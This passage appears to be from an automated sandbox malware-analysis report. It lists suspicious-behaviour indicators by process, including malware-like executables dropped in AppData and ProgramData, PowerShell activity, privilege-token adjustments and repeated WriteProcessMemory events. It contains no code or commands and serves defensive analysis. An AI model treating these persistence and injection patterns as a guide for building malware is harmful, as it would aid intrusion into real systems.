N/A N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\plugin3944 N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services\2plugin2958 N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\ProgramData\cwsdjtkixutq\kuytqawknxye.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A
N/A N/A C:\Windows\system32\dwm.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2\Jr.pif N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1120 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1964 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 5104 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 2552 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 2552 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1120 wrote to memory of 1680 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
